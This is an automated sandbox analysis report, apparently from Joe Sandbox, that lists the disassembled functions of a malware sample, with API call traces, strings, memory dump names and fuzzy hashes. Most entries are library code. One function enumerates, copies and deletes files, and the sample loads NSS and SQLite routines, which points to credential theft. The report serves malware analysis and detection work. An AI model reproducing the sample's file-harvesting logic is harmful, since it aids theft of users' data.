Opcode Fuzzy Hash: db96e167758c86719d692c4c5199dab64ef4f5507061074b3608a60f48ca4f0e
Instruction Fuzzy Hash: 09D05E31200538574A1016AEEC085EBBE2AEB127B1B104730FD99862B0E7259EA24AC0

Function 00620AE2 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00620AE9

Part of subcall function 00620D50: __EH_prolog3_catch.LIBCMT ref: 00620D57
Part of subcall function 00620D50: std::_Xinvalid_argument.LIBCPMT ref: 00620D7D

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: H_prolog3_catch$Xinvalid_argumentstd::_
String ID:
API String ID: 3139515330-0
Opcode ID: 86ef9d281a7e6a50b0f4d7125de0043afda9dec53646374963a8e545ea5dfa4b
Instruction ID: fae8d02e1990c136ba9e68f39168a052e3e05bbf75d1b752b449a51a8eb21f11
Opcode Fuzzy Hash: 86ef9d281a7e6a50b0f4d7125de0043afda9dec53646374963a8e545ea5dfa4b
Instruction Fuzzy Hash: 2BD0E236601218ABEF41EFA0C802B8D3F22AF04320F148508B6254A1A2C6329720EB18

Function 00623A7B Relevance: 1.3, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00628680,?), ref: 00623A93

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 45434f76380c41d177ce7aca867b1b5fd62f68db77d5387118acc01fc62d4540
Instruction ID: 7e50be77658744687f2a3112efa96eab92e96bc64332ffa97795fcc10851d4f8
Opcode Fuzzy Hash: 45434f76380c41d177ce7aca867b1b5fd62f68db77d5387118acc01fc62d4540
Instruction Fuzzy Hash: 45E02336601F341B87220959D5045E7BB9BDFD1B6170D4135DE85CF354CB35DD0549D0

Function 00618FEF Relevance: 1.3, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00618FF6

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 2c735e9250b12499049f906370950f08d6e5a9d24b93bd4d951c5364267ad183
Instruction ID: 9fced51b8bcd47cec76149b67cfa356100b1792f33061d10af70983514a2a101
Opcode Fuzzy Hash: 2c735e9250b12499049f906370950f08d6e5a9d24b93bd4d951c5364267ad183
Instruction Fuzzy Hash: BAE0EDB5A10108BFDF40DBA8D805A9EBBF9EB45354F144069B905E3240EA70EF409A50

Non-executed Functions

Function 6C406D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,6C50A8EC,0000006C), ref: 6C406DC6
memcpy.VCRUNTIME140(?,6C50A958,0000006C), ref: 6C406DDB
memcpy.VCRUNTIME140(?,6C50A9C4,00000078), ref: 6C406DF1
memcpy.VCRUNTIME140(?,6C50AA3C,0000006C), ref: 6C406E06
memcpy.VCRUNTIME140(?,6C50AAA8,00000060), ref: 6C406E1C
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C406E38

Part of subcall function 6C48C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C48C2BF

PK11_DoesMechanism.NSS3(?,?), ref: 6C406E76
TlsGetValue.KERNEL32 ref: 6C40726F
EnterCriticalSection.KERNEL32(?), ref: 6C407283

Strings

!, xrefs: 6C407123

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
String ID: !
API String ID: 3333340300-2657877971
Opcode ID: 0ab8f9e2787e73d6494f4f003e12eecaf903f74cf72242b2f8d79de83e39ab87
Instruction ID: 4cb0642094a931dbdea2f74c8dbd45449d8fe46f55d352914a1c47dc08b71380
Opcode Fuzzy Hash: 0ab8f9e2787e73d6494f4f003e12eecaf903f74cf72242b2f8d79de83e39ab87
Instruction Fuzzy Hash: 90728F75E452189FDB20DF28CC88F9ABBB5AF48305F1041ADD80DA7741EB31AA85CF91

Function 6C373C40 Relevance: 41.2, APIs: 20, Strings: 3, Instructions: 932COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C373C66
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6C373D04
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C373EAD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C373ED7
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C373F74
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C374052
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C37406F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6C37410D
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011A47,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C37449C

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C374452, 6C374486, 6C3744EA, 6C374571, 6C374580, 6C37458F, 6C37475A, 6C3747FA
database corruption, xrefs: 6C374490, 6C3744F4, 6C374599, 6C374764, 6C374804
%s at line %d of [%.10s], xrefs: 6C374495, 6C3744F9, 6C37459E, 6C374769, 6C374809

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: _byteswap_ulong$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2597148001-598938438
Opcode ID: 40a5e79510c548350d72f666ab518bd2472c4b8eb6876e719e9ea892a423564e
Instruction ID: b5adadc6ab8efa914bf4e83e4fb629db82c0ec5ba9a6f25a9f65b29a98d92f37
Opcode Fuzzy Hash: 40a5e79510c548350d72f666ab518bd2472c4b8eb6876e719e9ea892a423564e
Instruction Fuzzy Hash: ED82AF75A00205DFCB14CF69C480B9AB7F2BF49318F258198D905ABB51E73AEC46CFA5

Function 6C44AC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C44ACC4
PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6C44ACD5
memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6C44ACF3
SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6C44AD3B
SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C44ADC8
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C44ADDF
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C44ADF0

Part of subcall function 6C48C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C48C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C44B06A
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C44B08C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C44B1BA
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C44B27C
memset.VCRUNTIME140(?,00000000,00002010), ref: 6C44B2CA
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C44B3C1
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C44B40C

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
String ID:
API String ID: 1285963562-0
Opcode ID: c42e7b2bfd6d13578e628a956543361e4fc0b777e47d33e598a739afa8b0db94
Instruction ID: dc6932e9e8e1bb1d677a0e2ee3029806b2e75243c1b9b12c42de6d3be8c93046
Opcode Fuzzy Hash: c42e7b2bfd6d13578e628a956543361e4fc0b777e47d33e598a739afa8b0db94
Instruction Fuzzy Hash: 3F229C71A04701ABFB00CF14CC45F9A77E1EF84309F24856CE9585B7A2E772E859CB96

Function 6C3CECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C3CED38

Part of subcall function 6C364F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C364FC4

sqlite3_mprintf.NSS3(snippet), ref: 6C3CEF3C
sqlite3_mprintf.NSS3(offsets), ref: 6C3CEFE4

Part of subcall function 6C48DFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C365001,?,00000003,00000000), ref: 6C48DFD7

sqlite3_mprintf.NSS3(matchinfo), ref: 6C3CF087
sqlite3_mprintf.NSS3(matchinfo), ref: 6C3CF129
sqlite3_mprintf.NSS3(optimize), ref: 6C3CF1D1
sqlite3_free.NSS3(?), ref: 6C3CF368

Strings

offsets, xrefs: 6C3CEFAF, 6C3CEFDF, 6C3CF01F
unicode61, xrefs: 6C3CEDB5
snippet, xrefs: 6C3CEF05, 6C3CEF37, 6C3CEF7C
optimize, xrefs: 6C3CF199, 6C3CF1CC, 6C3CF211
matchinfo, xrefs: 6C3CF04F, 6C3CF082, 6C3CF0C2, 6C3CF0F2, 6C3CF124, 6C3CF169
simple, xrefs: 6C3CED79
fts4, xrefs: 6C3CF2AD
porter, xrefs: 6C3CED97
fts4aux, xrefs: 6C3CECF9
fts3tokenize, xrefs: 6C3CF30F
fts3_tokenizer, xrefs: 6C3CEE1A, 6C3CEEA8
fts3, xrefs: 6C3CF247

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 2518200370-449611708
Opcode ID: ac59fb0265c18c301b319e897cf031197fde9345604e20036892a7b2de2f7273
Instruction ID: f86d0dae68922d9d90fc63ff5514fee1e4e642ae4d1d78b03b88de7542f8fef1
Opcode Fuzzy Hash: ac59fb0265c18c301b319e897cf031197fde9345604e20036892a7b2de2f7273
Instruction Fuzzy Hash: C102BFB5B043005BE704AE31AC8576F36A5ABC970CF15853DD89A87B40EB75EC468B93

Function 6C447C00 Relevance: 31.9, APIs: 21, Instructions: 421COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C447C33
NSS_OptionGet.NSS3(0000000C,00000000), ref: 6C447C66
CERT_DestroyCertificate.NSS3(00000000), ref: 6C447D1E

Part of subcall function 6C447870: SECOID_FindOID_Util.NSS3(?,?,?,6C4491C5), ref: 6C44788F

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C447D48
PR_SetError.NSS3(FFFFE067,00000000), ref: 6C447D71
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C447DD3
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C447DE1
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C447DF8
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C447E1A
PR_SetError.NSS3(FFFFE067,00000000), ref: 6C447E58

Part of subcall function 6C447870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C4491C5), ref: 6C4478BB
Part of subcall function 6C447870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6C4491C5), ref: 6C4478FA
Part of subcall function 6C447870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6C4491C5), ref: 6C447930
Part of subcall function 6C447870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4491C5), ref: 6C447951
Part of subcall function 6C447870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C447964
Part of subcall function 6C447870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C44797A
Part of subcall function 6C447870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C447988
Part of subcall function 6C447870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6C447998
Part of subcall function 6C447870: free.MOZGLUE(00000000), ref: 6C4479A7
Part of subcall function 6C447870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6C4491C5), ref: 6C4479BB
Part of subcall function 6C447870: PR_GetCurrentThread.NSS3(?,?,?,?,6C4491C5), ref: 6C4479CA

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C447E49
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C447F8C
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C447F98
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C447FBF
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C447FD9
PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6C448038
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C448050
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C448093
SECOID_FindOID_Util.NSS3 ref: 6C447F29

Part of subcall function 6C4407B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C3E8298,?,?,?,6C3DFCE5,?), ref: 6C4407BF
Part of subcall function 6C4407B0: PL_HashTableLookup.NSS3(?,?), ref: 6C4407E6
Part of subcall function 6C4407B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C44081B
Part of subcall function 6C4407B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C440825

SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C448072
SECOID_FindOID_Util.NSS3 ref: 6C4480F5

Part of subcall function 6C44BC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6C44800A,00000000,?,00000000,?), ref: 6C44BC3F

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
String ID:
API String ID: 2815116071-0
Opcode ID: 41086b9705119d69133f0a202ffb5a57e582de8893999588871d4890feb4ac75
Instruction ID: 8a75baf1ed6bd294afdf5d4a72ea14908d6a34625587c367ee60942ea572e2ad
Opcode Fuzzy Hash: 41086b9705119d69133f0a202ffb5a57e582de8893999588871d4890feb4ac75
Instruction Fuzzy Hash: 5FE180716093009FF710CF25C880F5AB7E5EF44309F258A6DE9999BB51E732E806CB92

Function 0062785A Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 179filestringmemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 0062787F
HeapAlloc.KERNEL32(00000000), ref: 00627886
wsprintfA.USER32 ref: 0062789F
FindFirstFileA.KERNEL32(?,?), ref: 006278B6
StrCmpCA.SHLWAPI(?,00647AD8), ref: 006278D7
StrCmpCA.SHLWAPI(?,00647ADC), ref: 006278F1
CopyFileA.KERNEL32(?,?,00000001), ref: 006279D5

Part of subcall function 00627548: _memset.LIBCMT ref: 00627580
Part of subcall function 00627548: _memset.LIBCMT ref: 00627591
Part of subcall function 00627548: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 006275BC
Part of subcall function 00627548: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 006275DA
Part of subcall function 00627548: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 006275EE
Part of subcall function 00627548: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 00627601
Part of subcall function 00627548: StrStrA.SHLWAPI(00000000), ref: 006276B7

DeleteFileA.KERNEL32(?), ref: 006279F8
wsprintfA.USER32 ref: 00627918

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 006238A6: GetSystemTime.KERNEL32(?,00647807,?), ref: 006238D5

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

FindNextFileA.KERNEL32(?,?), ref: 00627A27
FindClose.KERNEL32(?), ref: 00627A3B
lstrcatA.KERNEL32(?), ref: 00627A69
lstrcatA.KERNEL32(?), ref: 00627A7C
lstrlenA.KERNEL32(?), ref: 00627A88
lstrlenA.KERNEL32(?), ref: 00627AA5

Strings

%s\*, xrefs: 00627899
%s\%s, xrefs: 00627912

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filelstrcpy$Findlstrlen$Heap_memsetwsprintf$AllocCloseCopyDeleteFirstNextProcessSystemTime
String ID: %s\%s$%s\*
API String ID: 2636950706-2848263008
Opcode ID: bee8e91ee8bcb61fc3880b37abfda9093d64e6709177730d22c6f95eed6e8e3c
Instruction ID: 99a395be4fe17dd3990b19fc9d51f84ef2a7d8d5cc96671a22911970b5d4e013
Opcode Fuzzy Hash: bee8e91ee8bcb61fc3880b37abfda9093d64e6709177730d22c6f95eed6e8e3c
Instruction Fuzzy Hash: DB713AB19002299BCF60EB64DC4ABDD777ABF05311F0008E9A609A3251EB35AFD5CF59

Function 0062DC54 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 440COMMON

Download Yara Rule

Strings

/, xrefs: 0062DD07
UT, xrefs: 0062DF7F

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID:
String ID: /$UT
API String ID: 0-1626504983
Opcode ID: 1eb1369ad0f161d049a9007f364a95f008113ec21ec596baef62616dd17dc81c
Instruction ID: 073b2926eaca647d36f251e0b9fcac56f38c08e5a99138460e1a21c4a7903ce6
Opcode Fuzzy Hash: 1eb1369ad0f161d049a9007f364a95f008113ec21ec596baef62616dd17dc81c
